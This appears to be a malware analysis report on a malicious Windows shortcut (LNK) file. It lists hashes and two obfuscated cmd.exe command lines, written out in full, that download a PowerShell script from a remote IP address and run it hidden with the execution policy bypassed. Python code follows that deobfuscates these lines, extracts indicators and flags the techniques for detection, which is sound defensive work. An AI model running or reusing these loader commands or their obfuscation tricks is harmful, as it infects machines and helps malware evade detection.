Summary by MalvaGPT
Characteristics
MD5: 258aa2891f92620aa8540ab6ba13c9f4
SHA1: 2167099d63bf1d92b02241312f467a5acbf4f181
SHA256: a1dbae0dd3e1d72f649be1c8a999274a22127ed27165018af1d96b7d6eda9baa
SHA384: 0cc2832d5b2c014cdfe468d809b2e21ee2b4c469cc10e05811bbe55465d616e4b4e7c2643c164894b44215cfa334cd28
SHA512: 5e4ab4a29737fbe010b3bf6bf46d57ba90293f7e51df64a599b9162363ba56c4f95c5b320c71ae5a1c46b4051bd5b4f28988c8ac7a80bbdfe42c1a8a48829857
SSDeep: 48:V7PtJeQqTellc51WUrfAx7PUuuGJIEuqTelA51WUSxB1Bg/E7o/j27H:V7lJe7ellcn7i7suuGJIYelAnCT7J7H
TLSH: 0E42AF8036E86304F2B2BE3DDE3A5B404537BAD0EE35839C8A10DC1D1966611CD74F36
File Structure
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/angeldogsled.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\i8d1u.ps1",2 > %TEMP%\xw.vbs && cscript //b %TEMP%\xw.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\i8d1u.ps1 && del %TEMP%\xw.vbs %TEMP%\i8d1u.ps1"

URLs in VB Code - #1

http://193.169.194.86/krr4g/angeldogsled.ps1

Deobfuscated PowerShell

Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1"

IconLocation

imageres.dll

LNK: Command Execution

cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/philanthropyephyra.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ALZrzi.ps1",2 > %TEMP%\vVy.vbs && cscript //b %TEMP%\vVy.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ALZrzi.ps1 && del %TEMP%\vVy.vbs %TEMP%\ALZrzi.ps1"

URLs in VB Code - #1

http://193.169.194.86/krr4g/philanthropyephyra.ps1

Deobfuscated PowerShell

Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1"

IconLocation

imageres.dll
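Both LNK command lines above are the same loader with different file names. cmd.exe /v turns on delayed expansion so the MSXML2.XMLHTTP ProgID is assembled from two variables (x1, x2) at run time, and the ADODB.Stream ProgID is split with VBScript string concatenation (^& is cmd's escaped &), so neither string appears whole inside the .lnk; the echoed VBScript is written to %TEMP%, run with cscript //b, the fetched .ps1 is run by a hidden PowerShell with the execution policy bypassed, and cmd's built-in del (which the report renders as Remove-Item) removes both droppers. The following Python is an added example, not part of this report or of any tool it names: it replays the two obfuscation tricks to recover the plain command, extracts the IOCs, and flags the chain. The sample inputs are the two command lines from the report; the indicator names and the benign control line are this example's own.

```python
"""Normalise and triage LNK command lines of the shape listed in the report."""
import re

# Constructed sample input: the two "LNK: Command Execution" values from the report above.
SAMPLES = [
    r'''cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/angeldogsled.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\i8d1u.ps1",2 > %TEMP%\xw.vbs && cscript //b %TEMP%\xw.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\i8d1u.ps1 && del %TEMP%\xw.vbs %TEMP%\i8d1u.ps1"''',
    r'''cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/philanthropyephyra.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ALZrzi.ps1",2 > %TEMP%\vVy.vbs && cscript //b %TEMP%\vVy.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ALZrzi.ps1 && del %TEMP%\vVy.vbs %TEMP%\ALZrzi.ps1"''',
]

SET_RE = re.compile(r'set\s+"([A-Za-z_]\w*)=([^"]*)"', re.IGNORECASE)
REF_RE = re.compile(r'!([A-Za-z_]\w*)!')
URL_RE = re.compile(r'https?://[^\s"\',<>]+')
COM_RE = re.compile(r'CreateObject\("([^"]+)"\)', re.IGNORECASE)
TEMP_RE = re.compile(r'%TEMP%\\[^\s",]+', re.IGNORECASE)
UA_RE = re.compile(r'setRequestHeader\s+"User-Agent",\s*"([^"]*)"', re.IGNORECASE)


def resolve_delayed_expansion(cmd):
    """Replay the set "name=value" assignments left to right, as cmd.exe /v does,
    expanding !name! inside each value against the variables defined so far, then
    expand every remaining !name! in the command. Returns (expanded, env)."""
    env = {}

    def expand(text):
        return REF_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), text)

    for name, value in SET_RE.findall(cmd):
        env[name.lower()] = expand(value)
    return expand(cmd), env


def strip_caret_escapes(cmd):
    """Remove cmd.exe's ^ escape, so the text reads as it lands in the .vbs file."""
    return re.sub(r'\^(.)', r'\1', cmd)


def join_vb_concats(cmd):
    """Fold VBScript literal concatenation ("ADO" & "DB.Str" & "eam") into one literal."""
    pat = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
    prev = None
    while prev != cmd:
        prev, cmd = cmd, pat.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', cmd)
    return cmd


def deobfuscate(cmd):
    """Variable replay, then caret removal, then literal folding."""
    expanded, _ = resolve_delayed_expansion(cmd)
    return join_vb_concats(strip_caret_escapes(expanded))


def extract_iocs(cmd):
    """Indicators a responder wants, taken from the deobfuscated line."""
    clean = deobfuscate(cmd)
    ua = UA_RE.search(clean)
    return {
        "urls": sorted(set(URL_RE.findall(clean))),
        "com_objects": sorted(set(COM_RE.findall(clean))),
        "temp_files": sorted(set(TEMP_RE.findall(clean))),
        "user_agent": ua.group(1) if ua else None,
    }


def _com_args_obfuscated(raw):
    # A CreateObject argument built from !vars!, & concatenation or ^ escapes.
    return any(re.search(r'[!&^]', a)
               for a in re.findall(r'CreateObject\(([^)]*)\)', raw, re.IGNORECASE))


def classify(cmd):
    """Names of the tradecraft indicators present (empty for a benign line).
    The indicator names are this example's own, not the report's."""
    raw, clean = cmd, deobfuscate(cmd)
    checks = {
        "delayed_expansion_obfuscation": bool(re.search(r'cmd(\.exe)?\s+/v\b', raw, re.I)
                                              and REF_RE.search(raw)),
        "split_com_progid": _com_args_obfuscated(raw),
        "echo_to_vbs_then_cscript": bool(re.search(r'\becho\b.*>\s*\S+\.vbs\b.*\bcscript\b', clean, re.I)),
        "hidden_bypass_powershell": bool(re.search(r'powershell.*-w(indowstyle)?\s+hidden', clean, re.I)
                                         and re.search(r'-e(p|xecutionpolicy)?\s+bypass', clean, re.I)),
        "http_download_to_temp": bool(URL_RE.search(clean)
                                      and re.search(r'savetofile\s+"%temp%', clean, re.I)),
        "deletes_own_droppers": bool(re.search(r'\b(del|remove-item)\b.*%temp%', clean, re.I)),
    }
    return [name for name, hit in checks.items() if hit]


if __name__ == "__main__":
    for sample in SAMPLES:
        print(deobfuscate(sample))
        print(extract_iocs(sample))
        print(classify(sample))
```

The string-matching rules in classify run on the deobfuscated text on purpose: a detection that looks for "MSXML2.XMLHTTP" or "ADODB.Stream" in the raw command line misses this sample, because those strings only exist after cmd.exe expands the variables and the VBScript engine joins the literals. The two structural indicators (delayed expansion with !var! references, and a CreateObject argument that is not a plain literal) are checked on the raw text and catch the obfuscation itself regardless of which ProgID it hides.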

258aa2891f92620aa8540ab6ba13c9f4 (13.09 KB)